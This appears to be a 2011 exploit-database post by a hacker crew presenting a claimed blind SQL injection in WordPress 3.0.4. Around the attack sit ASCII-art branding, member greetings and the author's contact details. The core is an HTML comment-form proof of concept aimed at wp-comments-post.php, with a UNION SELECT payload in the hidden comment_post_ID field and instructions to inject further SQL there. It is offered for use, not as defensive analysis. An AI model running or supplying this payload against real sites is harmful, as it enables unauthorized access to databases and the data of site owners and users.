Home / exploits WordPress 3.0.4 Blind SQL Injection
Posted on 11 September 2011
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ### # Title : WordPress 3.0.4 (comment_post_ID) <= Blind SQL Injection Vulnerability # Author : KedAns-Dz # E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com # Home : Hassi.Messaoud (30008) - Algeria -(00213555248701) # Web Site : www.1337day.com * www.exploit-id.com * sec4ever.com * r00tw0rm.com # Facebook : http://facebook.com/KedAns # platform : php # Impact : Blind SQL Injection Vulnerability # Tested on : Windows XP SP3 (fn) ## # [ThE g0bL!N & Dr.R!dE] => Welcome back Br0ther's - AlgeRiaNs^Expl0!teRs^4^Ev3R ! # @MilL0 { Kalashinkov3 } + @MerCaten { KnocKout} : We Miss U'rs Exploites (*_^) # ThanX t0 [ FoXx Gr!NE * FrINg0 * ZaK!-X-EnG * Dr.55h ] : Fr0m HMD-Cr3w ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h | # | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. | # | ------------------------------------------------- < | ### <*> Proof 0f Concept code : -------------------------------------------------------------------------------------------- <!-- <form action="http://[target]/[path]/wp-comments-post.php" method="post" id="commentform"> <input id="author" name="author" type="text" value="KedAns-Dz" size="30" aria-required='true'/> <input id="url" name="url" type="text" value="http://1337day.com" size="30"/> <textarea id="comment" name="comment" cols="45" rows="1" aria-required="true"> KedAns-Dz - Dz Offenders Cr3w - Inj3ct0r Team </textarea> <input name="submit" type="submit" id="submit" value="Post Comment"/> <input type='hidden' name='comment_post_ID' value="-1337' UNION SELECT (0,@@VERSION)--" id='comment_post_ID'/> --> -------------------------------------------------------------------------------------------- <+> Go T0 [ HTTP Debugger] => -- And Inj3ct the SQL Code in ( name='comment_post_ID' value='@ BLIND SQL INJ3CT1ON HERE ') // SP-thX t0 : { Dr.R!dE } #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===================================== # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > + Rizky Ariestiyansyah * Islam Caddy <3 # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * SeeMe * XroGuE * ZoRLu * gunslinger_ # anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team) * Dz Offenders Cr3w * Sec4ever # Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X # Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX # www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs .. #=================================================================================================
